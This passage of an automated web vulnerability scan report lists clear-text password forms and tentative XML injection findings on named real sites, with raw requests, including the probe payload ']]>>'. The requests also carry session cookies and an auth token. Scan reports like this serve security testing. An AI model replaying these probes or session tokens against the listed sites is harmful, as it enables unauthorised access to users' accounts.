User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Content-Length: 36629
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 14 May 2011 14:23:30 GMT
Date: Sat, 14 May 2011 14:23:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
</div>
           <form action="http://my.blackberry.com/cs_login" method="post" class="searchForm">
               <label for="loginNavUsername">
...[SNIP]...
<input type="text" value="Password" rimprompt="Password" id="loginNavFakePassword" name="fakepassword" /><input type="password" id="loginNavPassword" name="password" />
               <button type="submit" id="loginNavSubmit">
...[SNIP]...

9.8. http://www.99labels.com/v1/DeliveryPolicy.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/DeliveryPolicy.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /v1/DeliveryPolicy.aspx HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.1.10.1305398223; fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:37:34 GMT
Content-Length: 67094


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="DeliveryPolicy.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="loginfrminput">
<input name="ctl00$header1$TxtPwd" type="password" id="ctl00_header1_TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.9. http://www.99labels.com/v1/brand-items.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:37:50 GMT
Content-Length: 123747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="brand.aspx?SaleID=OTAx" id="aspnetForm">
<div>
...[SNIP]...
<div class="loginfrminput">
<input name="ctl00$header1$TxtPwd" type="password" id="ctl00_header1_TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.10. http://www.99labels.com/v1/index.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/index.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /v1/index.aspx HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:36:56 GMT
Content-Length: 22629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<body>
<form name="form1" method="post" action="index.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<div class="frminput">
<input name="myLogin$Password" type="password" id="myLogin_Password" tabindex="2" title="Password" class="field" />
<span id="myLogin_PasswordRequired" title="Password is required." style="color:Red;display:none;">
...[SNIP]...

9.11. http://www.99labels.com/v1/loginpopup.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/loginpopup.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /v1/loginpopup.aspx?pageurl=http%3A%2F%2Fwww.99labels.com%2Fv1%2Fbrand-items.aspx%3FSalesId%3DOTAx%26CategoryID%3DNzY5%26subCategoryID%3DNzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider=1; .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.3.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:38:08 GMT
Content-Length: 10015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Login
</tit
...[SNIP]...
<body>
<form name="signin" method="post" action="loginpopup.aspx?pageurl=http%3a%2f%2fwww.99labels.com%2fv1%2fbrand-items.aspx%3fSalesId%3dOTAx%26CategoryID%3dNzY5%26subCategoryID%3dNzg5" id="signin">
<div>
...[SNIP]...
<div class="frminput">
<input name="TxtPwd" type="password" id="TxtPwd" tabindex="2" class="field" />
</div>
...[SNIP]...

9.12. http://www.naukri.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naukri.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: NWS/1.0
X-Powered-By: PHP/5.2.3
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:58:14 GMT
Content-Length: 105852
Connection: close
Set-Cookie: test=naukri.com; path=/; domain=.naukri.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<form method="post" action="http://login.naukri.com/nLogin/Login.php" target="_self" class="m0p0">
<div class="informTP">
...[SNIP]...
<td class="w140 valt"><input id="password" name="PASSWORD" type="password" value=""/></td>
...[SNIP]...

9.13. http://www.quora.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; m-tz=300; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261736717.2135279484.1305305580.1305305580.1305305580.1; m-s=elrhGUM55MQtNfHFxEBqeA==

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.2
Date: Sun, 15 May 2011 11:19:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Length: 17438

<!DOCTYPE html><html><head><title>Quora</title><script src="http://d1zlmuwse3cba4.cloudfront.net/-8d444a36039c0a9a.js"></script><script>require.base="http://d1zlmuwse3cba4.cloudfront.net/-f79f52c66f01
...[SNIP]...
<div class="w3_5 p1"><form class="row w2_5 col inline_login_form" method="POST" id="__w2_qd0Z6ls_login_form"><div class="form_inputs">
...[SNIP]...
</label><input class="text" group="__w2_qd0Z6ls_interaction" type="password" name="password" w2cid="qd0Z6ls" id="__w2_qd0Z6ls_password" /><span class="hidden input_validation_error_text" id="__w2_qd0Z6ls_incorrect_password_error">
...[SNIP]...

9.14. http://www.quora.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quora.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.quora.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m-b=KnQltoIvGU-zgVNet6ZeBQ==; m-tz=300; __utmz=261736717.1305305580.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261736717.2135279484.1305305580.1305305580.1305305580.1; m-s=elrhGUM55MQtNfHFxEBqeA==

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.2
Date: Sun, 15 May 2011 11:19:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, no-store, max-age=0, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Length: 17438

<!DOCTYPE html><html><head><title>Quora</title><script src="http://d1zlmuwse3cba4.cloudfront.net/-8d444a36039c0a9a.js"></script><script>require.base="http://d1zlmuwse3cba4.cloudfront.net/-f79f52c66f01
...[SNIP]...
<div class="col w4 signup_form"><form class="w3" action="/signup/signup_POST" method="POST" id="__w2_URE5w9W_form"><input type="hidden" name="formkey" value="0e86cb9a6f72d403ba7cae637e739448" />
...[SNIP]...
</label><input class="text" group="__w2_URE5w9W_interaction" type="password" name="password" w2cid="URE5w9W" id="__w2_URE5w9W_password" /><div class="hidden __w2_PcX3xO7_invalid input_validation_error_text" id="__w2_PcX3xO7_invalid_message">
...[SNIP]...

9.15. http://www.townnews365.com/users/manage/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/manage/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213

Response

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4007076
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:34:06 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4603
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 38967


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<noscript>
<form action="/users/login/" method="post">
<p>
...[SNIP]...
</label>
<input type="password" name="password" id="password" size="30" /></p>
...[SNIP]...

10. XML injection
There are 9 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


10.1. http://api.facebook.com/restserver.php [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.vccircle.com%2F500%2Fnews%2Fintel-capital-puts-18m-in-new-follow-on-investments%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.vccircle.com/500/news/intel-capital-puts-18m-in-new-follow-on-investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 14 May 2011 11:09:16 -0700
Pragma:
X-FB-Rev: 378279
X-FB-Server: 10.32.6.111
X-Cnection: close
Date: Sat, 14 May 2011 18:07:16 GMT
Content-Length: 836

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.2. http://cwe.mitre.org/css/main.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/main.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/main.css?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:01 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.3. http://cwe.mitre.org/css/main.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/main.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/main.css]]>>?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:03 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.4. http://cwe.mitre.org/css/print.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/print.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/print.css?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:03 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.5. http://cwe.mitre.org/css/print.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /css/print.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/print.css]]>>?version=1.10 HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Referer: http://cwe.mitre.org/data/definitions/16.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:56:05 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.6. http://cwe.mitre.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cwe.mitre.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: cwe.mitre.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=79487238.1305399271.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79487238.1675907642.1305399271.1305399271.1305399271.1; __utmc=79487238; __utmb=79487238.1.10.1305399271

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 18:57:40 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.7. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [tem parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The tem parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the tem parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=7_0_5&qc=9660&tem=patni]]>> HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
